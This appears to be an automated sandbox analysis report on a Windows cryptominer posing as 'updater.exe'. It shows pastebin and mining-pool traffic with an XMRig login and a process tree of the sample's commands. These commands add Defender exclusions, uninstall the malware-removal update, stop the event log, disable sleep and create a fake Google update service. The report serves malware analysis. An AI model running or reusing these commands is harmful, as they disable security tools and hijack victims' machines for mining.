                                                                  2024-07-22 13:45:09 UTC114OUTGET /raw/xhASwz5f HTTP/1.1
                                                                  Accept: */*
                                                                  Connection: close
                                                                  Host: pastebin.com
                                                                  User-Agent: cpp-httplib/0.12.6
                                                                  2024-07-22 13:45:10 UTC391INHTTP/1.1 200 OK
                                                                  Date: Mon, 22 Jul 2024 13:45:10 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  x-frame-options: DENY
                                                                  x-content-type-options: nosniff
                                                                  x-xss-protection: 1;mode=block
                                                                  cache-control: public, max-age=1801
                                                                  CF-Cache-Status: EXPIRED
                                                                  Last-Modified: Sat, 20 Jul 2024 16:54:53 GMT
                                                                  Server: cloudflare
                                                                  CF-RAY: 8a73de9bd94432e2-EWR
                                                                  2024-07-22 13:45:10 UTC7INData Raw: 32 0d 0a 31 32 0d 0a
                                                                  Data Ascii: 212
                                                                  2024-07-22 13:45:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.549724141.94.96.1954435596C:\Windows\System32\conhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-07-22 13:46:08 UTC601OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 38 37 6f 77 59 77 4d 56 75 48 53 69 38 79 5a 50 57 34 55 67 43 72 51 76 61 62 36 78 6b 70 46 69 55 58 32 75 43 31 52 4d 78 54 47 31 44 4a 75 6b 42 55 57 70 59 31 58 44 6b 72 31 68 62 4a 4d 59 41 59 5a 78 31 52 59 64 41 4c 47 73 47 66 36 43 44 74 41 6f 67 7a 67 56 35 41 6a 50 62 77 78 22 2c 22 70 61 73 73 22 3a 22 33 34 32 33 31 35 35 36 34 33 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72
                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"87owYwMVuHSi8yZPW4UgCrQvab6xkpFiUX2uC1RMxTG1DJukBUWpY1XDkr1hbJMYAYZx1RYdALGsGf6CDtAogzgV5AjPbwx","pass":"3423155643","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","r
                                                                  2024-07-22 13:46:08 UTC539INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 37 61 61 38 34 35 61 31 2d 33 35 65 36 2d 34 38 33 32 2d 38 39 36 37 2d 65 31 61 33 61 38 39 30 65 39 63 36 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 31 63 35 66 39 62 34 30 36 63 63 66 38 65 30 62 63 32 31 63 32 65 33 36 65 61 38 37 31 32 64 31 34 32 39 61 38 64 39 62 66 66 61 63 34 63 65 62 36 65 34 38 37 36 62 37 39 63 38 35 32 31 34 62 34 39 63 33 65 38 62 31 38 30 30 30 30 30 30 30 30 66 63 62 33 38 34 62 38 38 37 37 30 66 33 35 31 32 34 31 64 62 62 34 62 35 38 37 38 62 62 38 63 37 63 32 61 32 62 62 66 61 62 38 66 64 39 34 32 35 62 30 35 61 39 38 35 64 32 63 30 32 63 39
                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"7aa845a1-35e6-4832-8967-e1a3a890e9c6","job":{"blob":"101081c5f9b406ccf8e0bc21c2e36ea8712d1429a8d9bffac4ceb6e4876b79c85214b49c3e8b1800000000fcb384b88770f351241dbb4b5878bb8c7c2a2bbfab8fd9425b05a985d2c02c9
                                                                  2024-07-22 13:46:52 UTC234OUTData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 37 61 61 38 34 35 61 31 2d 33 35 65 36 2d 34 38 33 32 2d 38 39 36 37 2d 65 31 61 33 61 38 39 30 65 39 63 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 36 50 50 69 79 58 6c 56 54 63 66 36 50 4c 79 47 63 66 49 73 61 79 66 47 69 30 69 55 22 2c 22 6e 6f 6e 63 65 22 3a 22 64 33 30 66 30 30 30 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 31 65 35 66 32 62 62 37 66 62 38 63 30 38 64 33 36 37 64 61 66 37 38 38 37 34 65 38 61 36 65 62 38 62 37 37 31 61 31 35 37 63 61 39 31 37 61 32 33 37 34 61 61 35 36 32 32 65 34 64 30 30 30 30 22 7d 7d 0d 0a
                                                                  Data Ascii: {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"7aa845a1-35e6-4832-8967-e1a3a890e9c6","job_id":"6PPiyXlVTcf6PLyGcfIsayfGi0iU","nonce":"d30f0000","result":"1e5f2bb7fb8c08d367daf78874e8a6eb8b771a157ca917a2374aa5622e4d0000"}}
                                                                  2024-07-22 13:46:52 UTC63INData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4f 4b 22 7d 7d 0a
                                                                  Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:09:44:53
                                                                  Start date:22/07/2024
                                                                  Path:C:\Users\user\Desktop\updater.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\updater.exe"
                                                                  Imagebase:0x7ff63b2a0000
                                                                  File size:5'285'888 bytes
                                                                  MD5 hash:D82677AC9971E38439A6F8069E8BA5BF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:09:44:58
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:09:44:58
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff7b4cb0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\wusa.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff64bbc0000
                                                                  File size:345'088 bytes
                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\ProgramData\Google\Chrome\updater.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                                  Imagebase:0x7ff76b5f0000
                                                                  File size:5'285'888 bytes
                                                                  MD5 hash:D82677AC9971E38439A6F8069E8BA5BF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 66%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:27
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff7b4cb0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:29
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:31
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:36
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:37
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\wusa.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff64bbc0000
                                                                  File size:345'088 bytes
                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:39
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:conhost.exe
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3249654814.000002862EC04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3249654814.000002862EC16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.2729862472.000002862EC1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:41
                                                                  Start time:09:45:40
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                  Imagebase:0x7ff7e52b0000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FF63B2A1140 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2081627349.00007FF63B2A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63B2A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2081611402.00007FF63B2A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2081645258.00007FF63B2B2000.00000002.00000001.01000000.00000003.sdmpDownload File
